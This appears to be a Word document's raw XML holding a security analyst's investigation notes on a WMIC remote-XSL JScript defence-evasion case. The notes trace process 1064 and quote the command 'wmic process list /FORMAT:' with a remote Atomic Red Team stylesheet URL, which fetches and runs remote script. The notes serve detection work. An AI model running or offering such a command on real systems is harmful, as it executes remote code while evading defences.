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B490" w14:textId="32ECCCAE" w:rsidR="008A6FD6" w:rsidRDefault="00040B04">
      <w:r>
        <w:t xml:space="preserve">Defence evasion wmic remote </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>xsl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>jscript</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> case:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C659965" w14:textId="1224D041" w:rsidR="00040B04" w:rsidRDefault="00040B04">
      <w:r>
        <w:t xml:space="preserve">Since the case </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tilte</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">has  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>jscript</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> start search with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>jscript</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> which loads 3 legit </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dlls</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> and the process id is 1064.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D2F2575" w14:textId="2717BEB7" w:rsidR="00040B04" w:rsidRDefault="00040B04">
      <w:r w:rsidRPr="00040B04">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="54FC4773" wp14:editId="22BFD801">
            <wp:extent cx="5731510" cy="3022600"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6350"/>
            <wp:docPr id="8136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10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07F3" w14:textId="2955FD0B" w:rsidR="00040B04" w:rsidRDefault="00040B04">
      <w:r>
        <w:t xml:space="preserve">Now search with processed 1064 and observed </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>a file</w:t>
      </w:r>
      <w:r w:rsidR="007F41C2">
        <w:t>s</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007F41C2">
        <w:t>are</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> created </w:t>
      </w:r>
      <w:r w:rsidR="007F41C2">
        <w:t>and internet</w:t>
      </w:r>
      <w:r w:rsidR="00785AFC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007F41C2">
        <w:t>setting registry changes and executes below command lines</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55BDD0D0" w14:textId="5E1B7AFF" w:rsidR="00DB059B" w:rsidRDefault="00DB059B" w:rsidP="00DB059B">
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00DB059B">
        <w:t>wmic  process</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DB059B">
        <w:t xml:space="preserve"> list /</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00DB059B">
        <w:t>FORMAT:\</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DB059B">
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00DB059B">
        <w:t>https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl</w:t>
      </w:r>
      <w:r w:rsidR="00785AFC">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="002C0068">
        <w:t>----</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="002C0068">
        <w:t xml:space="preserve">&gt; </w:t>
      </w:r>
      <w:r w:rsidR="00785AFC">
        <w:t xml:space="preserve">fetches </w:t>
      </w:r>
      <w:r w:rsidR="002C0068">
        <w:t xml:space="preserve">remote </w:t>
      </w:r>
      <w:r w:rsidR="00785AFC">
        <w:t>style sheets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C6E7A99" w14:textId="6550B35A" w:rsidR="007F41C2" w:rsidRDefault="007F41C2" w:rsidP="007F41C2">
      <w:r w:rsidRPr="007F41C2">
        <w:t>wmiprvse.exe -secured -Embeddin</w:t>
      </w:r>
      <w:r>
        <w:t>g</w:t>
      </w:r>
      <w:r w:rsidR="00785AFC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002C0068">
        <w:t>--</w:t>
      </w:r>
      <w:r w:rsidR="002C0068">
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidR="002C0068">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00785AFC">
        <w:t>creates secure isolated e</w:t>
      </w:r>
      <w:r w:rsidR="002C0068">
        <w:t>n</w:t>
      </w:r>
      <w:r w:rsidR="00785AFC">
        <w:t>vironment for queries for information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="264EBEB6" w14:textId="77777777" w:rsidR="00785AFC" w:rsidRDefault="00785AFC" w:rsidP="007F41C2"/>
    <w:p w14:paraId="62BD791A" w14:textId="54F33AD5" w:rsidR="00785AFC" w:rsidRDefault="00785AFC" w:rsidP="007F41C2">
      <w:r>
        <w:t>Overall activity:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17B6136F" w14:textId="28B83163" w:rsidR="007F41C2" w:rsidRPr="007F41C2" w:rsidRDefault="002C0068" w:rsidP="007F41C2">
      <w:r>
        <w:t xml:space="preserve">Wmic.exe is executed to fetch the remote </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>xsl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> files followed by collection of system information in isolated environment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="695E5478" w14:textId="77777777" w:rsidR="007F41C2" w:rsidRPr="007F41C2" w:rsidRDefault="007F41C2" w:rsidP="007F41C2"/>
    <w:p w14:paraId="546A9F3F" w14:textId="77777777" w:rsidR="007F41C2" w:rsidRPr="00DB059B" w:rsidRDefault="007F41C2" w:rsidP="00DB059B"/>
    <w:p w14:paraId="18E441DB" w14:textId="77777777" w:rsidR="00DB059B" w:rsidRDefault="00DB059B" w:rsidP="001C781B"/>
    <w:p w14:paraId="2371A84C" w14:textId="77777777" w:rsidR="001C781B" w:rsidRPr="001C781B" w:rsidRDefault="001C781B" w:rsidP="001C781B"/>
    <w:p w14:paraId="7C087C52" w14:textId="77777777" w:rsidR="001C781B" w:rsidRPr="001C781B" w:rsidRDefault="001C781B" w:rsidP="001C781B"/>
    <w:p w14:paraId="6150C62C" w14:textId="77777777" w:rsidR="005E1F3D" w:rsidRDefault="005E1F3D"/>
    <w:sectPr w:rsidR="005E1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04"/>
    <w:rsid w:val="00040B04"/>
    <w:rsid w:val="001C781B"/>
    <w:rsid w:val="002C0068"/>
    <w:rsid w:val="005E1F3D"/>
    <w:rsid w:val="005E51F4"/>
    <w:rsid w:val="007742D8"/>
    <w:rsid w:val="00785AFC"/>
    <w:rsid w:val="007F41C2"/>
    <w:rsid w:val="008A6FD6"/>
    <w:rsid w:val="00DB059B"/>
    <w:rsid w:val="00D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B7DA"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{2A787609-5543-476E-85BC-666C4073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2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-09-21T10:11:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-09-21T10:11:00Z</dcterms:modified>
</cp:coreProperties>
</file>